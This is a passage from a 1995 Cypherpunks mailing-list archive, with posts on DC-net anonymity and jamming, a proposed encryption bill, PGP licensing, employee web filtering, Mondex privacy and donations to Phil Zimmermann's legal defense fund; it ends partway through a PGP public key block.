all members of the DC-net you could XOR them and see who's >talking to who. Presumably people will use multiple key-ids on the net as well - Alice may have a general-use "Alice" key, and maybe also a general-use "Medusa" key, but Alice or Medusa may have also arranged with Bob to use a different key for traffic where he doesn't mind if she knows he sent it and he doesn't want anyone else knowing it's being sent to her. Also, he can do this anonymously, so she doesn't know either: Alice posts Plaintext("Hi, I'm Alice, key AAAA") Bob posts Encrypt(AAAA, "Hi, Alice, I'm Dr. X, Key XXXX, please post a key I can use to talk to you") Alice posts Encrypt(XXXX, Signed(AAAA, "Hi, Dr. X, use key AXAX")) Bob's message lets him send stuff to Alice without anyone, including her, knowing it's from him, since the name X and key XXXX are new randoms. Alice signs her response so Dr. X knows that key AXAX will really go to Alice and not to Mallet who's impersonating Alice; she doesn't really care who X is. If traffic analysis is a concern (Alice noticing, for instance, that she's getting a _lot_ of requests from key AXAX for her remailer to send stuff to destination ZZZZ), Bob can keep sending her new requests for keys and ids, and not reuse them more than he thinks is safe. >I'd have thought the most significant problem would be reserving the >blocks in an anonymous fashion while not allowing denial-of-service >attacks. Since anybody can send bits at any time, and nobody can tell who without lots of collusion, you can't prevent denial-of-service (well, I assume not, unless there's something rather non-obvious in the literature.) The Bad Guy can decide if it's more fun to jam the reservations or the messages. What reservation does for you is gives a short inefficient period (with possible collisions, backoff-and-retry, etc., depending on algorithm) that you can use to reserve a longer one-user period for message traffic, so you can spend most of your time talking instead of haggling over interruptions. One way to do reservations is to use some variant on Slotted Aloha for the reservation period - for example, everybody picks a random id number for the session, (with odd parity or odd high-bit to make collision detection easier), waits a random number of slots, and then sends their id number. If there's a collision, wait and retry, maybe with exponential backoff. After the first slot that's got data and looks like it doesn't have a collision, anybody who thinks that it was their number picks a different number, waits a short random number of slots and posts; first one wins. (If you're using 32-bit randoms and have fewer than a million players, the chances of two undetected collisions in a row are really small, even if people cheat a bit on their backoffs.) Winner announces how many slots he's going to use up for his message, so you know when to start again. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:25 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:25 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507180649.XAA25423@ix3.ix.netcom.com> At 06:06 PM 7/17/95 +0200, Hadmut Danisch wrote: >1. If the bill becomes law, how can someone who violates it be >punished? Only by violating the Constitution and basic common sense, but that doesn't usually bother the Government very much... >2. Does someone who publishes software which encodes or encrypts >(ASCII is a code, isn't it?) have to prove that he has provided the >universal decoder to the state or does the state have to prove that he >didn't do? It's not defined in the law, and if the good Senator writes stupid offensive laws which are so stupid that they have big holes in them like this, I don't intend to correct him :-) >In the former case, does he get any receipt from the department of >justice and what does the receipt say (1.3MByte of software >received...)? Nobody knows. >In the latter case, how do they want to prove he didn't? If he gave >just a big > for(i=0;;i++) try_key(i); >how do they want to prove this doesn't work? [... halting problem...] The proposed law doesn't say that the mechanism has to decrypt the message in a short period of time. If the law passes, I'll be happy to help write the PGP Universal Decoder program for anybody who needs it to take to court. Some kinds of program are affected by the Halting Problem; other kinds are easy to show that they halt. For the PGP Universal Decoder, trial division can find the factors for an N-bit key in much less than 2**N tries, if you program it well, and you know it will halt by then, if the Universe hasn't decayed first. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:46 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:46 PDT Subject: Root Causes Roots Message-ID: <199507180649.XAA25403@ix3.ix.netcom.com> At 02:08 PM 7/17/95 -0400, Jim Ray wrote: [ Crypto timeline and discussion omitted ] >Careful thought reveals a atrong suspicion that the "3/5ths people" >[slaves] had more use for crypto at the time than free white males >did, but I doubt much, if any, evidence of that activity was >preserved, and I'm sure it was _forcefully_ discouraged if ever >discovered...My point is, slaves, or those who live in fear of >eventual slavery, for whatever reason, have a strong affinity for >cryptography. Note, for example, early use [mentioned in the timeline >above] by the Jewish people. Or, more precisely, they have a strong affinity for private in-group communications. Cryptography's a bit tough in an environment where it was often illegal to teach slaves to read. On the other hand, oral cultures are often good at using metaphor and in-jokes and shared knowledge to express things that the speaker doesn't want the oppressive group to understand. I've seen commentaries talking about that in North American black culture, and there are other examples like Cockney rhyming slang. And then, of course, there are totally incomprehensible communication systems like Gaelic :-), which the Brits tried hard to stamp out. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:54 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:54 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <199507180649.XAA25411@ix3.ix.netcom.com> At 09:07 PM 7/17/95 -0400, tim werner wrote: >>... I was talking to one of the sys admins at >>A-B, and he said that we weren't allowed to use PGP to encrypt our mail, >>because Viacrypt owned the commercial rights. Actually, it's less clear than that. It's pretty clear what you can do with ViaCrypt code; just read the license to see who can use it, and you can send any kind of messages you want over it, even for money. On the other hand, the definitions of "non-commercial use" for RSAREF and IDEA are far less clear (and they're clearer for RSAREF than for IDEA, and I got the impression from what I read somewhere on the net or in the PGP docs that the initial permission from Ascom-Tech for use of IDEA with PGP was pretty informal, and that they've been trying to tighten up what's covered.) (Also RSAREF licenses have changed from version to version, and the license PKP uses to distribute versions of RSAREF may also have changed?) Selling software containing the code is pretty clearly commercial. Non-commercial messages from your personal non-business machine are clearly non-commercial. Providing a service of encrypting and decrypting messages for people for money sounds like it's _very_ probably commercial. Encrypting and decrypting messages to/from your business that deal with money are a very gray area. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:52:17 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:52:17 PDT Subject: bi-directional dining cryptographers Message-ID: <199507180649.XAA25432@ix3.ix.netcom.com> At 12:24 PM 7/17/95 -0500, Phil Fraering wrote: >I'd also like to point out that this system indicates that during >an attack/disruption on a traditional dc-net, the disruptor can >tell what the original person was trying to send, even though noone >else can. > >And then perhaps XOR the data with something offensive, and if the >original sender tries to re-send, broadcast the result of the XOR, >resulting in a total net output of the offensive material. That's difficult - you have to identify that the sender is sending the same message while the message is being sent, rather than one or two bit-times later, and you can't fake encryption with an unknown keyid or digital signatures. (Digital signatures aren't something everybody would use very often on a DC-net, since the purpose of the net is to be anonymous, but since you can do anonymous broadcasts, you can anonymously post a signature key for your nym if you want to.) Also, there's no need to combine jamming and posting an offensive message; they both work well separately. I suppose you could do that if you only want to harass the net a bit (e.g. replace all trafic to remailer X with new remail to whitehouse.gov, or replace all postings from Cancelmoose with complaints about censorship), but basically DCnets degrade rapidly if the social structure of the net members does. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From greg at ideath.goldenbear.com Tue Jul 18 00:17:26 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Tue, 18 Jul 95 00:17:26 PDT Subject: SurfWatch for employees (ugh) Message-ID: <199507180636.AA02056@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Consistent with the trend towards treating employees like children, Webster Network Strategies has announced (but apparently has not shipped) a product similar to SurfWatch but aimed at an employment environment. The product is called "WebTrack" and supposedly supports access lists of URLs, where access can be allowed to "all but these sites" or "only to these sites". The product also can be configured to log all Web usage by users subjected to its reign of terror. :) WebTrack is priced at $7,500 with an annual subscription to its list of interesting (err, forbidden) sites priced at $1,500. The article in the 7/10/95 Infoworld doesn't list contact information for Webster Network Strategies. What is it, two months between deployment of software designed to restrict net access to one segment of the population perceived as especially vulnerable and the subsequent application of that technology to other target groups? My bet is the next target group will be university students, followed by "affinity marketing" with various repressive organizations (whose names I elide in the interests of greater Cypherpunk harmony, pick your own and imagine them here.) Of course, the next step is to use restrictive licensing/distribution terms (a la Netscape/Mozilla) and a nifty freeware/software package available only from a site which also carries porn (or other forbidden fruit) to make the customers/purveyors of this crap twist in the wind a bit. Break the terms of the license and get the software somewhere else? Avoid using the coolest new thing because you're hooked up via we'll-think-for-you.net? Doh. (Pedants need not point out that personal choice (and personal filtering) are always appropriate, and indeed empowering. Neither WebTrack nor NetSurf are marketed to help people subject themselves to a regime of repression - they are intended and sold to allow the purchaser to control what others (perceived as having fewer or no rights) will read and view. ". . inasmuch as you have done it unto one of the least of these my brethren, ye have done it unto me." Matthew 25:45) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAtWUn3YhjZY3fMNAQH8EAP/aFXe7uI1EuIB31L8h7H+5l3Mg1aQE7e9 i86FnqwGMDg5JlDvJD05dXOBXeInvKtc6ZD0Us+qwDmg2ISo/Yu0QCfedTBgZ7fq s/3WFwtOcpiBG7YTkxGJrvB+r4KIgodb9QSGEQ8yofKaRLT33IkgO3ijxrnyoNkX vm/tZ8EnoV0= =hrOo -----END PGP SIGNATURE----- From an250888 at anon.penet.fi Tue Jul 18 02:14:42 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Tue, 18 Jul 95 02:14:42 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up Message-ID: <9507180840.AA14290@anon.penet.fi> >> >and, conspiracy theories non-withstanding, we the people do not govern >> >America --we are only given a short list of politicians who have sold >> >their soul to CFR's satanist inner circle. >> >> What's CFR? >> > >Council on Foreign Relations. or Code of Federal Regulations. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From habs at warwick.com Tue Jul 18 06:12:25 1995 From: habs at warwick.com (Harry S. Hawk) Date: Tue, 18 Jul 95 06:12:25 PDT Subject: SurfWatch for employees (ugh) In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com> Message-ID: <199507181311.JAA06412@cmyk.warwick.com> I don't think there is ever anything wrong with employeer's restricting what employee's do on any legal or ethical level. Evolution (a la Bionomics) will sort out the winners and losers. /hawk > or "only to these sites". The product also can be configured to log all > Web usage by users subjected to its reign of terror. :) WebTrack > are always appropriate, and indeed empowering. Neither WebTrack nor From lmccarth at cs.umass.edu Tue Jul 18 06:46:32 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 18 Jul 95 06:46:32 PDT Subject: WebTrack URL/Contact Info Message-ID: <9507181346.AA21915@cs.umass.edu> The WWW site for Webster Network Strategies and its WebTrack software is http://www.webster.com/ According to that page: How to reach us: E-mail info at webster.com Call (941) 261-5503 Fax (941) 261-6549 Write to WNS, 1100 5th Avenue South, Suite 308, Naples, FL 33940 From jgrubs at voxbox.norden1.com Tue Jul 18 06:54:01 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 18 Jul 95 06:54:01 PDT Subject: SurfWatch for employees (ugh) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Greg Broiles writes: > Consistent with the trend towards treating employees like children, > Webster Network Strategies has announced (but apparently has not > shipped) a product similar to SurfWatch but aimed at an employment > environment. The product is called "WebTrack" and supposedly supports Forcing workers to keep their minds on their work? Shameful... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAu7mN74r4kaz3mVAQEWhgP9FDkAtsbPMVk5/FTCGaImFu7Iqllw0Y55 Rv2gXxVdiYKmK449i1+PQhJvpnLJE5qVRqMeCjhcysrbI/WK9RUDP+6FVenfDjWZ Kxh385qzNWE1sJTv92ii3g4dbIp7yziePJc9ZH6HqZ9i1MAyQfjEPutNcE5xgLSH hBUYN0Q1cPE= =l0BB -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From jgrubs at voxbox.norden1.com Tue Jul 18 06:54:02 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 18 Jul 95 06:54:02 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <5ZsF9c6w165w@voxbox.norden1.com> -----BEGIN PGP SIGNED MESSAGE----- jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) writes: > As I recall, the following is a correct scenario: a customer can use PGP to > send credit card numbers to a vendor he's making a personal purchase from, > but the vendor must use Viacrypt. If the customer is buying something to use > for business, BOTH must use Viacrypt. In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAu5iN74r4kaz3mVAQF11QQAiNccy69sb5OA1jmOpErqqZNJ4sNx3smW tAJQ3lD1op4qlPIO48vxwkvr+IaQyyOkf797+9Ca1z9WtxgwSamo32BQnPQZ6Pbm Vipmpwrabrxq67TOrGgxNp3UN7oBZl3eyad0hIj6ENzs8u1wi3wkHUV/3z341XB7 u953orkOZSk= =UYrt -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From mark at unicorn.com Tue Jul 18 07:06:32 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Tue, 18 Jul 95 07:06:32 PDT Subject: Mondex (forward) Message-ID: Thought this might be of interest... forwarded with permission.. >From Andy Meredith (meredith at bcs.org.uk) on the ecm list : On Jul 18, 9:21am, Marcel van der Peijl wrote: > Subject: Re: e$, c$$$, Cyberbucks & ECash - terminology. > > > electronic cash (also digital cash) is a general term for > > > the concept of encrypted messages that have inherent value > > > - as opposed to credit notes or electronic checks. I guess > > > that the Mondex smart cards have ecash in them, but that > > > seems different. > > I am such a bad reader! You are right. This is a good definition > of electronic cash or digital cash. Mondex is questionable. The > card has an account, and uses crypto to proof it is a real Mondex > card, so you'd better believe it when it says it took the money > of it's internal balance. I would vote this is not digital cash. I am participating in the Mondex pilot scheme in Swindon. It took me a great deal of pushing to get _any_ details at all. The details I did get didn't go into the encryption schemes used or any such fun stuff. It did in fact take quite a while for me to realise the significant differences between ecash and Mondex. As they didn't, in the end, make me sign an NDA, I guess I can share. 1 - The Value is not encrypted on the card, that is held as plain text, it is the front door on the card that is heavily guarded. If therefore you can inject value into the card from the back door, it is then taken as real money. The logic being; Hey it managed to get through all that security which is imposible for anything except another mondex card to do, it must therefore be Mondex money ... that's Ok then. There can never be a software only version of Mondex as it stands. The trust is in the front door, not the cash values themselves. 2 - Some of their transaction monitoring is very "Big Brother"esque. As you can imagine, if a card is seen to be creating money but not consuming it, there IS a problem. Therefore whenever you get some money from a "hole in the wall", the bank sucks over your transaction log & error log. It will of course only ever use this for security monitoring. It will never follow the likes of AMEX and start stock pilling these transactions, using it's knowledge of the which physical entity own what card ID, and using the cross reference for market research/direct mail/consumer profiling. No of course not. That would be TOTALLY unethical ... 3 - Mondex is billed as "Electronic Cash", but you won't find the concept of anonymity in there anywhere. They talk about it, but I haven't seen them write it down explicitly. One could suggest however that that "Cash == Anonymous", so the scheme would have to be anonymous for them to have a right to the "Electronic Cash" title. > So what is the name for schemes like this? How about "Stored Value Card" >-- End of excerpt from Marcel van der Peijl One interesting thing that I noted. When I read through the technical blerb on ecash a while back, I had to sit back and think very clearly, and read very slowly. However, it was relatively easy to understand the bits, and then even easier to put the bits together into a system. The reason, I suggest, is that if you understood all the encryption technology behind ecash, and had the requirements that it has for anonymity and security (hand in hand). You would reinvent ecash. Maybe the layering would be subtly different, the real one ond your independant derivative wouldn't interact, but ... If however you were to have asked me to explain ecash a week later, I would have been totally stumped. It is a very elegant system. Mondex, on the other hand, worried from the word go. It just didn't seem to add up. Apart from everything else, why were they being so damned secretive. I read and thought, and read and thought. Then it finally dawned on me. Mondex just simply doesn't have the same requirements list as ecash. I was prejudging the requirements from my previous exposure to ecash. Ask me to explain Mondex to you now ... what do you want to know :) Andy M (this is my opinion of information gained outside of company time. It is not the opinion my employer.) And : On Jul 18, 12:29pm, Marcel van der Peijl wrote: > Subject: Re: Mondex > > I am participating in the Mondex pilot scheme in Swindon. It > > took me a great deal of pushing to get _any_ details at all. > > Of course! Security through obscurity has always been a good way of > protecting your systems... ;) Absolutely. That's why VISA have lost so little money :) > > 3 - Mondex is billed as "Electronic Cash", but you won't find the > > concept of anonymity in there anywhere. They talk about it, > > but I haven't seen them write it down explicitly. > > Hahahaha. Let me explain. You can buy the card anonymously. This > gives anonimity.... > NOT! Actually, you can't. You need to supply bank details in order to get one. At least you do for the Swindon trial. The cards in use here are in fact combined ATM and Stored Value ;) cards. They have all your bank details in a mag. stripe on the back of the card. The current batch of EPOS terminals don't use this stripe, but I wait with interest. > They are forgetting that tracebility plus one link of a person to an > 'anonymous' account is the same as identification. Sainsbury's (et al) sussed that one a while back. Hence the introduction of "Customer Loyalty Cards" (yuch!!). Thereby allowing them to bind purchases/times/locations => Credit card numbers => Physical customer addresses & therefore demographic data. Only in this situation for Credit card number read Mondex card ID. > Do you realise any ATM, and a lot of stores, have security camera's > embedded? No, they wouldn't use that to link a person to a card, > would they? That would be unethical... No need. They have not only formed the link, but they are getting you to fill in the damned form :) > > How about "Stored Value Card" > For Mondex, perfect. What about FV? And NetChex? Don't know about these ones. > About your perception of ecash: I admit that the blurp on our server > does not fully cover the system in such a way it is easy to remember > and explain. Not at all. If you had asked me to explain the system while it was still fresh in my mind, I would have had no trouble. It is very neat and logical, but it is also pretty intricate. Apart from anything else, I didn't feel it was necessary to hold on to the mental model of how it works. I liked it. However, Mondex ... >-- End of excerpt from Marcel van der Peijl Cheers Andy M From jya at pipeline.com Tue Jul 18 07:21:23 1995 From: jya at pipeline.com (John Young) Date: Tue, 18 Jul 95 07:21:23 PDT Subject: AYN_ran Message-ID: <199507181421.KAA00235@pipe4.nyc.pipeline.com> The New Yorker, July 24, 1995: "Twilight of the Goddess." A critical look at Ayn Rand and her work. Thirteen years after Rand's death, her books still sell more than three hundred thousand copies a year. Not since the popular novels of almost a century before, bent on refutations of Darwin or God, and offering what George Eliot called "a complete theory of life and manual of divinity, in a love story," had there appeared so vividly accessible and reassuring a guide for the cosmically perplexed. As late as 1991, the Library of Congress found that a majority of Americans surveyed named "Atlas Shrugged" as the book that had most influenced their lives, after the Bible. AYN_ran [About 57K, in three parts] From cme at TIS.COM Tue Jul 18 07:24:11 1995 From: cme at TIS.COM (Carl Ellison) Date: Tue, 18 Jul 95 07:24:11 PDT Subject: S. 982 Kyl-Leahy(-Grassley) NII Protection Act In-Reply-To: <199507180318.UAA16624@comsec.com> Message-ID: <9507181418.AA15335@tis.com> I read it and it looks OK -- except, as I said in e-mail to Senators Kyl and Leahy, we can't let ourselves believe that legislation can keep computers safe from hackers. Many of these threats are outside the reach of US law. Instead, we need good firewalls, encrypting file systems, etc. - Carl From trei Tue Jul 18 07:25:52 1995 From: trei (Peter Trei) Date: Tue, 18 Jul 95 07:25:52 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <9507181425.AA10035@toad.com> > I remember one of the sponsors of the CDA ranting about pornographers > "profiteering" from pornographic images on the Internet, blissfully unaware > that stuff downloaded from alt.sex.binaries.insert.your.fetish.here doesn't > profit anyone but the phone company (for the hours you stay online to get > it). I called up Exon's press secretary and asked him about this. He claimed that BBS's were uploading advertisments to the Net, and this was the 'profiteering' referred to. He was immune to reason on this, and felt that the CMU 'study' was rigorous. It's true that a some of the pics in those groups include stamped-in BBS names and phone numbers, but my impression was always that this was the BBS operators trying to do a little damage control - so that when random users post their pix (on which they claim copyright, ignoring the fact that most of their scans rip off magazine publishers), they can recognize the 'piracy', and also earn a little publicity. For a good backgrounder on the story, check http://www.cybernothing.org/cno/reports/cyberporn.html Peter Trei ptrei at acm.org Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From mark at unicorn.com Tue Jul 18 08:00:25 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Tue, 18 Jul 95 08:00:25 PDT Subject: Deployment In-Reply-To: <199507160119.SAA10662@blob.best.net> Message-ID: On Sat, 15 Jul 1995, James A. Donald wrote: > Uh, pardon my ignorance, but what is privtool, and why is it > a good thing to port it to windows? It's a PGP-aware mailer for SunOS/Linux, and has the most highly-integrated PGP interface that I know of (e.g. just tick a check-box to encrypt/sign/remail). Even a newbie Windows user can handle that much.. > (As compared to the task of integrating PGP into microsofts > mail tool.) Well, someone's (mm at qpsx.oz.au, dunno if they're on the list) already done that for MS-Mail, at least in Beta form, according to their article on alt.security.pgp... However, their message implies that you have to use extra commands on the menus in order to deal with PGP mail, it's not just there waiting for you to tick the box.. Mark From hoz at univel.telescan.com Tue Jul 18 08:01:38 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Tue, 18 Jul 95 08:01:38 PDT Subject: Zimmerman legal fund Message-ID: <9507181501.AA11591@toad.com> > >I just received a bit of mail asking about the Zimmermann Legal >Defense Fund, which, like many folks out there, I support. The writer >implied that he might give money because I suggest it in my sig, but >expressed questions about its legitamacy, and questioned if it's "just >someone trying to exploit the Zimmerman case" > >Could someone in the know talk about the relationship between FV and >the ZLDF? I don't like to spread misinformation, so I won't answer >based on conjectures. > I had similar concerns last month, so I emailed the following to csn.net!dubois ("Philip L. Dubois") > > Could you please inform me of the financial status of the fund > raising for the Phil Zimmerman case? How much money has been > collected, and how much has been spent, and what are the future > anticipated expenses? I might like to contribute, but "a normally > unreliable source" has claimed to me that something on the order of > $50,000 has been spent, and there is not even an indictment yet. > Is this true and is this reasonable? Is it true that some/all of > his legal services are being done "pro bono" (I hope I got that phrase > correct, maybe I should just say "for free") > > If you choose to reply, may I have permission to make your reply public? > > Rick F. Hoselton (who doesn't claim to present opinions for others) > I got back the following reply: > >Mr. Hoselton-- > >Since the government has not yet decided whether to indict Mr. Zimmermann, or at least hasn't >told us its decision if it has made one, we continue to accept donations to the Zimmermann >Legal Defense Fund. I've never added up the total amount of all donations to date, but I >doubt that it would be in the neighborhood of $50,000. I can tell you that several lawyers >have been working on the case and that all of them but me have done so pro bono, which means >that they have not been paid. Since I have been lead counsel and have therefore had primary >responsibility for the defense, I have not been pro bono, at least not entirely; I have not >billed for much of my time. We have no way of knowing how long this case will go on. The >government could tell us today that it won't indict, in which case it will be all over, or it >could indict very soon, or it could do nothing until June of 1996 when the statute of >limitations expires. > >You have my permission to make my reply public. > >Philip L. Dubois >Counsel for Philip Zimmermann > Rick F. Hoselton (who doesn't claim to present opinions for others) From danisch at ira.uka.de Tue Jul 18 08:37:07 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 18 Jul 95 08:37:07 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <9507181535.AA21841@elysion.iaks.ira.uka.de> > >1. If the bill becomes law, how can someone who violates it be > >punished? > > > > - From the top of my head: > Subpoena your service provider's computer records. That's not a problem. He will find a lot of encrypted messages and images of nude girls. Both is not illegal. :-) > Intimidate your roommate > into testifying against you. I don't have a roommate. > Tapping your phone. I use encrypted modem connections and Nautilus. > Feds are in the business of putting people behind bars. They are _very_ good > at it. That's the question. How long can they put me behind bars? > I'm betting that the Feds will adopt as a working definition anything that > requires a key to decrypt the communications. That means compression > software, rot13, and most hash functions are ok. rot13 is not ok, 13 is the key. Someone should register at the department. :-) > Expert Testimony: "We experimented with 113,296 keys chosen at random and > the defendants algorithm took an average of 29,000 years to find each one. > It is our professional opinion, therefore, that the defendant is jacking us > around and ought to be keelhauled". Oh boy, wonderful experts.... Hadmut From wilcoxb at nagina.cs.colorado.edu Tue Jul 18 08:38:04 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Tue, 18 Jul 95 08:38:04 PDT Subject: Here it is; bi-directional dining cryptographers In-Reply-To: <199507180649.XAA25418@ix3.ix.netcom.com> Message-ID: <199507181537.JAA28073@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > Since anybody can send bits at any time, and nobody can tell who without > lots of collusion, you can't prevent denial-of-service (well, I assume not, > unless there's something rather non-obvious in the literature.) Chaum discusses it a lot in his original DC paper. In the limit, any disrupter can be ousted from the Net. What you do is "trap" the disrupter by getting all ready to speak and then not saying anything. (The only reason that you do not say anything is that you are about to reveal your secret bits, and anything you say will be traceable to you. If you don't mind getting identified with your words this once then go ahead.) The disrupter foolishly blurts out some garbage at that instant and then everyone holds up their secret bits to see who "lied" about their XOR (who inverted their output when they weren't supposed to.) Of course if all but one or two participants are colluding disrupters then it will probably be the one or two who are ousted instead of the disrupters! But this is sort of the same effect, no? This presupposes a block-scheduling algorithm, or at least a set-up in which the disrupter is committed to his output *before* he realizes that his intended victim is not transmitting. Are you familiar with the topology of DC-nets-- how anonymity is preserved relative to two participants as long as there is a "path" of shared bits between them? (That is, A shares with B who shares with C, now A and C are anonymous relative to each other. Of course if B decides to out them, then they are high and dry. The interesting thing is that if A and C both start sharing with D, then C is no longer capable of outting them unless he collaborates with D.) The result is that each individual participant in a DC net can increase their level of security just by sharing with a new partner. (Of course, if that new guy is a tentacle of the "anti-anon" colluders, then the individual has not actually increased their security. But they have not decreased it either.) I really like that about DC-net topology-- any two participants can elect to boost their anonymity-level without needing the other participants' permission and without increasing the workload on the other participants. Bryce signatures follow /=============------------ Our e-mail should be Bryce Wilcox, Programmer Between you and me bryce.wilcox at colorado.edu For "pretty good privacy" ------------=============/ Use PGP! -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMAvVWJCUT4gUihHlAQGsyQP+IgY/hHMGtj7kYj3eiIVSoSaAkDOPeNYS YnPLSahNfGPKtd8cOyX4QXlrBKVSUgJS3hrAFxSGspIl36YOFSLloFNK73lk7DaU JJmfISWJg8nYWzURpNc/VJkcI9u5u30izD5VVUOFXX0jRohBYxjdUFmaLOlY1vu7 1/xVNHCVhZo= =FIjz -----END PGP SIGNATURE----- From aba at dcs.exeter.ac.uk Tue Jul 18 08:46:38 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 18 Jul 95 08:46:38 PDT Subject: Zimmerman legal fund Message-ID: <23424.9507181545@exe.dcs.exeter.ac.uk> -----BEGIN PGP SIGNED MESSAGE----- Anon writes: > Could someone in the know talk about the relationship between FV and > the ZLDF? I don't like to spread misinformation, so I won't answer > based on conjectures. I'd be interested to hear this too, but what I am concerned about is that the whole thing is too strongly tied to first virtual. I mean there was the Yellow Ribbon Campaign but all URLs out of that page point to FV, no mention of the at least two other (more convenient for most people, and hence in Phil Zs interests) methods: a) PGPed email CC no. to Phil Dubois (Phil Zs chief legal counsel) b) similar PGPed email CC no. to some guy in Europe who was offering to collect up all of the European donations, and send them to Dubois in lump sums to save on currency exchange costs. Both of these I believe have been signed by people who directly have their keys signed by Phil Z himself, I have a copy of PGP signed a) saved from the original post made by Hugh Miller and this is what I show to people who ask. (copy of the bank details from Hugh's post pasted below as [1] original PGP signed post by Hugh by email). Geoffrey Kidd has the details from Hugh's post in his Phil Z Blood Bank which he posts to alt.security.pgp periodically, the idea being that enough folks give money to the Phil Z legal defense fund on a regular small donation basis, if enough people did this he could be supported indefinately. What I would like to know is why neither of these [a) or b)], and especially why a) has not been mentioned on any of the widely advertised yellow ribbon campaign pages... is it for Phil Z ... or is it for Phil Z with the provision that you start a FV account something which not everyone who wants to contribute to Phil Z is likely to want to be bothered doing. No slur on FV, just it adds unnecesary complications to donations, through what now must be _the_ most widely publisized USENET based effort to raise funds for Phil. Adam [1] ====================================================================== [...] To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address: Philip Dubois 2305 Broadway Boulder, CO USA 80304 (Phone #: 303-444-3885) To send a wire transfer, your bank will need the following information: Bank: VectraBank Routing #: 107004365 Account #: 0113830 Account Name: "Philip L. Dubois, Attorney Trust Account" Now here's the neat bit. You can make a donation to the PZDF by Internet mail on your VISA or MasterCard. Worried about snoopers intercepting your e-mail? Don't worry -- use PGP. Simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it (yours, hopefully :-)); a telephone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to donate. (Make this last item as large as possible.) Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's public key, enclosed below. (You can also sign the message if you like.)i E-mail the output file to Phil Dubois (dubois at csm.org). ^^^^^^^^^^^^^^ [this is a mistake Hugh made Dubois' address is dubois at csn.org as can be easily verified from his PGP key, which is signed by Phil Z also] Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away. Here is Phil Dubois's public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8 5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN 